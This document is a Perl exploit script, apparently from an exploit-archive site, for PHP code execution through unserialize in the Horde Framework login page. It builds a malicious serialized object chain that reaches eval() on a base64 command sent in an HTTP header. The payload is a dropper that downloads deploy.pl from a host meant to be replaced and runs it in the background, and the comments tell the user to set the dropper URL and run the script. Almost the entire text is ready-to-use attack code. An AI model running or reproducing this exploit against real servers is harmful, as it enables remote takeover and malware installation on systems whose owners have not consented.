Horde Framework Unserialize PHP Code Execution

Posted on 01 July 2014
#ported from metasploit by irrlicht
#june 2014
#modify dropper url and run
use strict;
use warnings;
use LWP::UserAgent;
use WWW::Mechanize;
use MIME::Base64;

if (!$ARGV[0]) {
 print "specify full login.php url
";
 exit;
}
my $dropper = 'system("mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl http://0.0.0.0/deploy.pl; nohup perl deploy.pl > /dev/null 2>&1 &");';
my $command = encode_base64($dropper . "echo "999999999"; echo "EXPLOITED"; system("ps aux; ls -la /tmp/\" \""); echo "999999999";", "");
my $loginpath = $ARGV[0];
my $php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();";
my $payload_serialized = "_formvars=O:34:"Horde_Kolab_Server_Decorator_Clean":2:{s:43:"x00Horde_Kolab_Server_Decorator_Cleanx00_server";";
$payload_serialized .= "O:20:"Horde_Prefs_Identity":2:{s:9:"x00*x00_prefs";O:11:"Horde_Prefs":2:{s:8:"x00*x00_opts";a:1:{s:12:"sizecallback";";
$payload_serialized .= "a:2:{i:0;O:12:"Horde_Config":1:{s:13:"x00*x00_oldConfig";s:". length($php_injection) .":"$php_injection";}i:1;s:13:"readXMLConfig";}}";
$payload_serialized .= "s:10:"x00*x00_scopes";a:1:{s:5:"horde";O:17:"Horde_Prefs_Scope":1:{s:9:"x00*x00_prefs";a:1:{i:0;i:1;}}}}";
$payload_serialized .= "s:13:"x00*x00_prefnames";a:1:{s:10:"identities";i:0;}}s:42:"x00Horde_Kolab_Server_Decorator_Cleanx00_added";a:1:{i:0;i:1;}}";
$|=1;
my $ua = new LWP::UserAgent(ssl_opts => { verify_hostname => 0 });
$ua->timeout(3);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13");
my $request;
$request = new HTTP::Request(POST => $loginpath);
$request->header('CMD' => $command);
$request->header('Content-Type' => "application/x-www-form-urlencoded");
$request->content($payload_serialized);
my $mech = WWW::Mechanize->new(timeout => 3, ssl_opts => { verify_hostname => 0 });
my $response = $mech->request($request);
my $code = $response->code;
my $body = $response->decoded_content;
print $response->code."
";
#print $body."
";
if ($body =~ /999999999/) {
 print $body."
";
}
TOP
Malware :

Last 20
Exploits :

Last 20